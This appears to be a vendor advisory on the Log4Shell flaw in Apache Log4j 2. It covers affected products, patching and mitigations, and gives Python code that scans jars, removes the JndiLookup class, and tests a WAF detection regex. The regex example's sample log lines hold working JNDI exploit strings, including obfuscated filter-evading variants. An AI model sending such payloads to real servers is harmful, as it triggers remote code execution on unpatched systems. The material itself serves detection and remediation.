Log4j Critical Vulnerability 

Today (12/10/2021), the critical vulnerability CVE-2021-44228 in Apache Log4j 2 was disclosed, with zero-day exploitation actively occurring. If an application uses Log4j 2 (versions 2.0-beta9 through 2.14.1) and logs any string an attacker can influence, such as an HTTP header, a username or a chat message, it is vulnerable: the library resolves a ${jndi:...} lookup embedded in the logged message, fetches an attacker-supplied object over LDAP or RMI, and the attacker gets unauthenticated remote code execution on the system.

Currently, there is a public proof-of-concept, and we are observing the first wave of discovery attacks (mass scanning to find out who is vulnerable) and the beginnings of a second wave delivering crypto-mining software. Following the usual escalation pattern for this type of vulnerability, we expect automated ransomware deployment to begin by Monday (12/13/2021).

Affected Systems/Applications of Note 

As stated above, applications that use Log4j 2 to log user-controlled input are vulnerable. Some applications and services reported vulnerable at the time of writing include:

  • Apache Solr, Druid, Flink, and Struts2
  • Logstash
  • Elasticsearch
  • Kafka
  • Even home entertainment applications like Minecraft and Steam!

Whether a given product is actually exploitable depends on the Log4j version it bundles and how logging is configured, so treat this list as a starting point and check each vendor's advisory rather than assuming a product not listed here is safe.

Remediation 

The fixed release, Log4j 2.15.0, is available directly for developers using the component: https://logging.apache.org/log4j/2.x/download.html (later 2.x releases supersede it; use the newest available).

Third-party applications and systems that bundle Log4j should be patched with vendor updates immediately, and any follow-up patches should be evaluated and installed as quickly as possible.

Mitigation 

Where a patch is not yet available, the attack can be mitigated (as Cloudflare and others have described) with one of these two configuration changes:

  • Set the system property “log4j2.formatMsgNoLookups” to “true” (Log4j 2.10 and later; the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true has the same effect)
  • Remove the JndiLookup class from the log4j-core jar on the classpath

Removing the class is the more robust of the two: Apache later noted that the formatMsgNoLookups property does not cover every logging configuration, so treat it as a stopgap until the library itself is updated.
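The two practical questions behind the remediation and mitigation sections are "which jars on this host still carry a vulnerable log4j-core?" and "how do I strip JndiLookup from one I cannot patch yet?". The script below is an added example written for this article, not TorchLight's tooling or anything from the Log4j project: it walks a directory for *.jar files, reads the version from the Maven pom.properties that log4j-core ships (falling back to the manifest's Implementation-Version), flags jars that still contain JndiLookup.class at a version below 2.15.0, and rewrites a jar without that class (the same effect as Apache's zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). The sample jars it builds are constructed stand-ins, not real Log4j builds; real deployments also need fat jars and WAR/EAR archives unpacked, which this example does not do.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Deleting this class from log4j-core disables the JNDI lookup that CVE-2021-44228 abuses.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core-*.jar ships; used here to read the library version.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# First release that fixed CVE-2021-44228 (later 2.x releases supersede it).
FIXED_VERSION = (2, 15, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' -> (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(g or 0) for g in m.groups()) if m else (0, 0, 0)


def log4j_core_version(jar):
    """Version string from pom.properties, falling back to the manifest; None if absent."""
    try:
        props = jar.read(POM_PROPERTIES).decode("utf-8", "replace")
        m = re.search(r"^version=(\S+)", props, re.M)
        if m:
            return m.group(1)
    except KeyError:
        pass
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        return m.group(1) if m else None
    except KeyError:
        return None


def inspect_jar(path):
    """Report whether a jar still carries JndiLookup and whether its version predates the fix."""
    with zipfile.ZipFile(path) as jar:
        has_lookup = JNDI_LOOKUP_ENTRY in jar.namelist()
        version = log4j_core_version(jar)
    # Class present but no version metadata: treat as vulnerable until proven otherwise.
    vulnerable = has_lookup and (version is None or parse_version(version) < FIXED_VERSION)
    return {"path": str(path), "version": version,
            "has_jndi_lookup": has_lookup, "vulnerable": vulnerable}


def scan_tree(root):
    """Inspect every *.jar below root (nested jars inside fat jars are not unpacked here)."""
    return [inspect_jar(p) for p in sorted(Path(root).rglob("*.jar"))]


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class, the same effect as 'zip -q -d'."""
    path = Path(path)
    tmp = path.with_name(path.name + ".tmp")
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_ENTRY:
                dst.writestr(info, src.read(info.filename))
    tmp.replace(path)
    return inspect_jar(path)


def build_sample_jar(path, version, with_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar; the class entry is placeholder bytes."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_lookup:
            jar.writestr(JNDI_LOOKUP_ENTRY, b"not real bytecode")
    return path


def demo():
    """Scan constructed jars, harden the vulnerable one, and return findings keyed by file name."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        old = build_sample_jar(root / "log4j-core-2.14.1.jar", "2.14.1")
        build_sample_jar(root / "log4j-core-2.15.0.jar", "2.15.0")
        build_sample_jar(root / "log4j-core-2.0-beta9.jar", "2.0-beta9")
        before = {Path(r["path"]).name: r for r in scan_tree(root)}
        after = remove_jndi_lookup(old)
        return {"before": before, "after": {Path(after["path"]).name: after}}


if __name__ == "__main__":
    for state, findings in demo().items():
        for name, r in findings.items():
            print(state, name, r["version"], "JndiLookup" if r["has_jndi_lookup"] else "-",
                  "VULNERABLE" if r["vulnerable"] else "ok")
```

Point scan_tree at an application's lib directory (or /) to get the inventory; remove_jndi_lookup is only for jars you cannot replace right away, and the process has to be restarted afterwards because the JVM has already loaded the old class. A 2.15.0 jar still contains JndiLookup.class, which is why the check combines class presence with the version rather than relying on either alone.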

Another mitigation is to use web application firewalls and other filtering devices to block the strings used by the public proof-of-concept. Test this before deploying it, as it can very well break things! From current knowledge, the regular expression to block with, or to search logs for, is:

  • \$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+

Note that this pattern is anchored on the literal ${jndi: and on three URL schemes, so it catches the plain proof-of-concept and not much else; treat it as a detection aid and a noise reducer, not a substitute for patching.
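To show what the regex above does and does not catch, here is an added example (written for this article, not code from TorchLight or from Cloudflare) that runs it over a few constructed access-log lines. It goes beyond the page's pattern in one way: Log4j resolves nested lookups such as ${lower:j} or ${::-j} inside a message, and attackers use them to hide the literal jndi from filters, so the example also resolves those lookups first and then flags any ${jndi: regardless of scheme. The log lines, IP addresses and the NESTED_LOOKUP/NORMALIZED_PATTERN names are all constructed for the example.

```python
import re

# The pattern quoted in the post: catches the plain proof-of-concept string.
POC_PATTERN = re.compile(r"\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+")

# Nested lookups attackers use to hide the literal 'jndi' from that pattern. Each of
# ${lower:x}, ${upper:x}, ${::-x} and ${env:NONE:-x} resolves to just 'x' in Log4j.
# (upper: would really produce 'X'; the case-insensitive match below makes that irrelevant.)
NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}|\$\{[^}$]*:-([^}$]*)\}", re.I)

# After nested lookups are resolved, flag any JNDI lookup regardless of URL scheme.
NORMALIZED_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text):
    """Resolve nested lookups innermost-first until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = NESTED_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def classify(line):
    """Return (matched_by_poc_regex, matched_after_normalization) for one log line."""
    return bool(POC_PATTERN.search(line)), bool(NORMALIZED_PATTERN.search(normalize(line)))


def scan_log(lines):
    """Indices of suspicious lines, with which of the two checks caught each one."""
    hits = []
    for i, line in enumerate(lines):
        poc, norm = classify(line)
        if poc or norm:
            hits.append((i, poc, norm))
    return hits


# Constructed access-log lines (not captured traffic); the payload rides in the User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:17:02:11 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:17:02:12 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:17:02:13 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:17:02:14 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:17:03:00 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for i, poc, norm in scan_log(SAMPLE_LOG):
        print(f"line {i}: poc_regex={poc} normalized={norm}")
```

Run as written, only the first payload line trips the page's regex, while all four payload lines trip the normalized check and the benign line trips neither. The same idea applies when searching logs with grep: search for ${ and any of lower:, upper: or :- near it, not just for jndi:ldap. A WAF rule built on the normalized form still cannot see payloads delivered in fields it does not inspect (request bodies, non-HTTP protocols, data logged later from a database), which is the reason the patch, not the filter, is the fix.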

Conclusion 

Because this component is used by a substantial number of applications and systems, keep a close watch on anything that uses Java, and on Apache's Java projects in particular. A spike in CPU usage on such a system may indicate crypto-mining activity, and ransomware could be next; unexpected outbound LDAP or RMI connections from a Java application server to unfamiliar hosts are a more direct sign that the exploit has already fired.

Reach out to TorchLight at sales@torchlight.io for help on remediation or any questions.

Additional Resources

  • https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
  • https://www.zdnet.com/article/log4j-zero-day-flaw-what-you-need-to-know-and-how-to-protect-yourself/